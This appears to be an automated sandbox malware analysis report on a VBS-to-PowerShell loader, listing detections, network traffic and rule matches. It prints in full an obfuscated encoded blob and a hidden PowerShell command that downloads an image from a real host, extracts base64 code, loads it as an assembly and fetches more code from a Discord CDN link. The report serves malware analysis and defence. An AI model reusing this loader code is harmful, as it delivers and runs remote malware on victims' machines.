gTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMetho
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Avira URL Cloud: Label: malware
        Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
        Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Virustotal: Detection: 12%Perma Link
        Source: http://uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
        Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49720 version: TLS 1.2

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
        Source: unknownDNS query: name: paste.ee
        Source: cognitivo.vbs.7.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
        Source: cognitivo.vbs.7.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
        Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
        Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /d/c2iY1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /d/c2iY1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
        Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
        Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 13:21:22 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=0mrBYZPux09FrNH7qF46RvKw4xN8mgCUUXbpZEHi5a0-1716816082-1.0.1.1-gA1S7WfoiDHlqth_Q.0KWt56IJPSGy1IJ3aiNJTJ35xOrGAdYo7OYuZMkT4dmNV9wOpDdFpSn0f.Fcj84uAAOQ; path=/; expires=Mon, 27-May-24 13:51:22 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1mm3dOG7lZk%2F9UZdAHH340u7NEJkHuuyOm3yQXo5tqyauSud2CUtXNRpfs4DQKUiV5EO7SoFtPMMLqiEExOuszP3Wat4lPPDjQsMzfs68%2BYnHNeuREFC9mx8%2BIZGXcrupL0PQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=KnuSFznkcmGwng_2q6jYx8JxFiET3VpAEvkeyFm2YWE-1716816082969-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 88a64ec67b6641e1-EWRalt-svc: h3=":443"; ma=86400
        Source: wscript.exe, 00000000.00000003.2122141460.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123643143.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126200279.00000185E88C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
        Source: powershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.2675899972.000001B7D74D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320773596.0000013F96241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2312727802.0000025D0003D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.2320773596.0000013F9C73D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uploaddeimagens.com.br
        Source: powershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000003.00000002.2675899972.000001B7D74AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2675899972.000001B7D745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320773596.0000013F96241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2312727802.0000025D00047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2312727802.0000025D0005C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
        Source: powershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: powershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
        Source: wscript.exe, 00000000.00000003.2119987319.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2124998386.00000185E85C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122821846.00000185E85C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123474865.00000185E85C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125035589.00000185E85C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121451392.00000185E85D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/c2iY1
        Source: wscript.exe, 00000000.00000003.2121976786.00000185E882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125599835.00000185E882F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121956771.00000185E8824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/c2iY14
        Source: wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/c2iY18
        Source: wscript.exe, 00000000.00000003.2121976786.00000185E882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125599835.00000185E882F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121956771.00000185E8824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/c2iY1h
        Source: wscript.exe, 00000000.00000002.2124868255.00000185E6805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121995772.00000185E67DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/c2iY1l
        Source: wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/c2iY1t
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
        Source: powershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
        Source: powershell.exe, 00000005.00000002.2320773596.0000013F96241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49720 version: TLS 1.2

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 2672, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 616, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9738
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9738Jump to behavior
